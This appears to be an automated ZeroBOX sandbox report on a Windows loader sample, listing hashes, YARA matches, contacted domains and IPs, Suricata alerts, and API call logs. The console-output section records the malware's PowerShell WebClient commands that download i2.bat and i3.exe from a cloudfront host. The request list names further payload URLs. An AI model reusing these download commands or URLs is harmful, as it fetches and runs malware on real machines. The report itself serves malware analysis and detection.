popup
Summary | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

loader-1000.exe

NSIS Generic Malware Malicious Library Antivirus UPX DLL OS Processor Check PE32 PE File PowerShell
  1. Resubmit sample
Category Machine Started Completed
FILE s1_win7_x6403_us April 27, 2024, 11:54 a.m. April 27, 2024, 11:56 a.m.
Size 49.7KB
Type PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
MD5 705685a8deace858e7fc849471c045f3
SHA256 7ff9182009a077962d7c00b287caaa60fe7888e5d6cf6018c14f967a2441a3f9
CRC32 40B958F2
ssdeep 1536:XferrLkSRoe8C4UZsys0Dh1duFpyFI+Plt:Xfi3k+oWDBDh1duFpXWlt
Yara
  • Malicious_Library_Zero - Malicious_Library
  • PE_Header_Zero - PE File Signature
  • NSIS_Installer - Null Soft Installer
  • IsPE32 - (no description)
  • UPX_Zero - UPX packed file

Name Response Post-Analysis Lookup
apps.identrust.com
A 61.111.58.35
CNAME a1952.dscq.akamai.net
CNAME identrust.edgesuite.net
A 61.111.58.34
23.210.247.48
monoblocked.com
A 45.130.41.108
45.130.41.108
240216234727901.mjj.xne26.cfd
A 179.43.158.2
94.156.35.76
d68kcn56pzfb4.cloudfront.net
A 99.86.146.198
A 99.86.146.78
A 99.86.146.194
A 99.86.146.176
99.86.146.198
IP Address Status Action
164.124.101.2 Active Moloch
179.43.158.2 Active Moloch
185.172.128.59 Active Moloch
45.130.41.108 Active Moloch
61.111.58.34 Active Moloch
99.86.146.198 Active Moloch

Suricata Alerts

Flow SID Signature Category
TCP 185.172.128.59:80 -> 192.168.56.103:49173 2400031 ET DROP Spamhaus DROP Listed Traffic Inbound group 32 Misc Attack
TCP 192.168.56.103:49176 -> 99.86.146.198:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49182 -> 99.86.146.198:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49172 -> 99.86.146.198:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49163 -> 99.86.146.198:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49169 -> 99.86.146.198:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49183 -> 45.130.41.108:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49173 -> 185.172.128.59:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 185.172.128.59:80 -> 192.168.56.103:49173 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 185.172.128.59:80 -> 192.168.56.103:49173 2016538 ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download Potentially Bad Traffic
TCP 185.172.128.59:80 -> 192.168.56.103:49173 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 185.172.128.59:80 -> 192.168.56.103:49173 2015744 ET INFO EXE IsDebuggerPresent (Used in Malware Anti-Debugging) Misc activity

Suricata TLS

Flow Issuer Subject Fingerprint
TLSv1
192.168.56.103:49163
99.86.146.198:443 		C=US, O=Amazon, CN=Amazon RSA 2048 M01 CN=*.cloudfront.net fa:21:45:dc:4d:94:03:a3:09:77:51:78:4a:21:f2:c5:6d:94:be:52
TLSv1
192.168.56.103:49182
99.86.146.198:443 		C=US, O=Amazon, CN=Amazon RSA 2048 M01 CN=*.cloudfront.net fa:21:45:dc:4d:94:03:a3:09:77:51:78:4a:21:f2:c5:6d:94:be:52
TLSv1
192.168.56.103:49176
99.86.146.198:443 		C=US, O=Amazon, CN=Amazon RSA 2048 M01 CN=*.cloudfront.net fa:21:45:dc:4d:94:03:a3:09:77:51:78:4a:21:f2:c5:6d:94:be:52
TLSv1
192.168.56.103:49172
99.86.146.198:443 		C=US, O=Amazon, CN=Amazon RSA 2048 M01 CN=*.cloudfront.net fa:21:45:dc:4d:94:03:a3:09:77:51:78:4a:21:f2:c5:6d:94:be:52
TLSv1
192.168.56.103:49169
99.86.146.198:443 		C=US, O=Amazon, CN=Amazon RSA 2048 M01 CN=*.cloudfront.net fa:21:45:dc:4d:94:03:a3:09:77:51:78:4a:21:f2:c5:6d:94:be:52
TLSv1
192.168.56.103:49183
45.130.41.108:443 		C=US, O=Let's Encrypt, CN=R3 CN=monoblocked.com 2c:d3:99:84:08:33:38:25:31:da:34:23:da:07:ec:a6:6f:e6:0a:ac

Time & API Arguments Status Return Repeated

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0
Time & API Arguments Status Return Repeated

WriteConsoleW

 buffer: The system cannot find the file i2.bat.
console_handle: 0x0000000b
1 1 0

WriteConsoleW

 buffer: Exception calling "DownloadFile" with "2" argument(s): "The remote server retur
console_handle: 0x00000023
1 1 0

WriteConsoleW

 buffer: ned an error: (404) Not Found."
console_handle: 0x0000002f
1 1 0

WriteConsoleW

 buffer: At line:1 char:111
console_handle: 0x0000003b
1 1 0

WriteConsoleW

 buffer: + $cli = New-Object System.Net.WebClient;$cli.Headers['User-Agent'] = 'InnoDown
console_handle: 0x00000047
1 1 0

WriteConsoleW

 buffer: loadPlugin/1.5';$cli.DownloadFile <<<< ('https://d68kcn56pzfb4.cloudfront.net/l
console_handle: 0x00000053
1 1 0

WriteConsoleW

 buffer: oad/dl.php?id=444', 'i2.bat')
console_handle: 0x0000005f
1 1 0

WriteConsoleW

 buffer: + CategoryInfo : NotSpecified: (:) [], MethodInvocationException
console_handle: 0x0000006b
1 1 0

WriteConsoleW

 buffer: + FullyQualifiedErrorId : DotNetMethodException
console_handle: 0x00000077
1 1 0

WriteConsoleW

 buffer: Exception calling "DownloadFile" with "2" argument(s): "The underlying connecti
console_handle: 0x00000023
1 1 0

WriteConsoleW

 buffer: on was closed: Could not establish trust relationship for the SSL/TLS secure ch
console_handle: 0x0000002f
1 1 0

WriteConsoleW

 buffer: annel."
console_handle: 0x0000003b
1 1 0

WriteConsoleW

 buffer: At line:1 char:40
console_handle: 0x00000047
1 1 0

WriteConsoleW

 buffer: + (New-Object Net.WebClient).DownloadFile <<<< ('https://d68kcn56pzfb4.cloudfro
console_handle: 0x00000053
1 1 0

WriteConsoleW

 buffer: nt.net/load/dl.php?id=456','i3.exe')
console_handle: 0x0000005f
1 1 0

WriteConsoleW

 buffer: + CategoryInfo : NotSpecified: (:) [], MethodInvocationException
console_handle: 0x0000006b
1 1 0

WriteConsoleW

 buffer: + FullyQualifiedErrorId : DotNetMethodException
console_handle: 0x00000077
1 1 0
Time & API Arguments Status Return Repeated

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004ac218
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004ac7d8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004ac7d8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004ac7d8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004abf58
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004abf58
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004abf58
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004abf58
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004abf58
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004abf58
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004ac7d8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004ac7d8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004ac7d8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004aca58
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004aca58
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004aca58
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004ac3d8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004aca58
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004aca58
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004aca58
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004aca58
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004aca58
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004aca58
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004aca58
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004acc58
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004acc58
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004acc58
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004acc58
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004acc58
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004acc58
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004acc58
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004acc58
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004acc58
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004acc58
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004acc58
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004acc58
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004acc58
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004acc58
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004ac6d8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004ac6d8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x003ef210
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x003ef7d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x003ef7d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x003ef7d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x003eef50
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x003eef50
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x003eef50
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x003eef50
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x003eef50
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x003eef50
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

 1 1 0
section .ndata
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://185.172.128.59/ISetup1.exe
suspicious_features GET method with no useragent header suspicious_request GET https://d68kcn56pzfb4.cloudfront.net/load/th.php?c=1000
suspicious_features GET method with no useragent header suspicious_request GET https://d68kcn56pzfb4.cloudfront.net/load/dl.php?id=425&c=1000
suspicious_features GET method with no useragent header suspicious_request GET https://d68kcn56pzfb4.cloudfront.net/load/dl.php?id=456
request GET http://185.172.128.59/ISetup1.exe
request GET http://240216234727901.mjj.xne26.cfd/f/fvgbm0216901.txt
request GET http://apps.identrust.com/roots/dstrootcax3.p7c
request GET https://d68kcn56pzfb4.cloudfront.net/load/load.php?c=1000
request GET https://d68kcn56pzfb4.cloudfront.net/load/th.php?c=1000
request GET https://d68kcn56pzfb4.cloudfront.net/load/dl.php?id=425&c=1000
request GET https://d68kcn56pzfb4.cloudfront.net/load/dl.php?id=444
request GET https://d68kcn56pzfb4.cloudfront.net/load/dl.php?id=456
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

 process_identifier: 2188
region_size: 2162688
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026e0000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2188
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x028b0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2188
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72fd1000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2188
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0246a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2188
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 8192
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72fd2000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2188
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02462000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2188
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02472000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2188
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x028b1000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2188
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x028b2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2188
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024da000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2188
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02473000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2188
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02474000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2188
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024eb000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2188
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024e7000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2188
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0246b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2188
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024d2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2188
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024e5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2188
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02475000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2188
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024dc000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2188
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02690000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2188
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02476000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2188
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024ec000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2188
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024d3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2188
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024d4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2188
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024d5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2188
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024d6000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2188
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024d7000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2188
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024d8000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2188
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024d9000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2188
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x028a0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2188
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x028a1000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2188
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x028a2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2188
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x028a3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2188
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x028a4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2188
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x028a5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2188
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x028a6000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2188
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x028a7000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2188
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x028a8000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2188
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x028a9000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2188
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x028aa000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2188
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x028ab000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2188
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x028ac000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2188
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x028ad000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

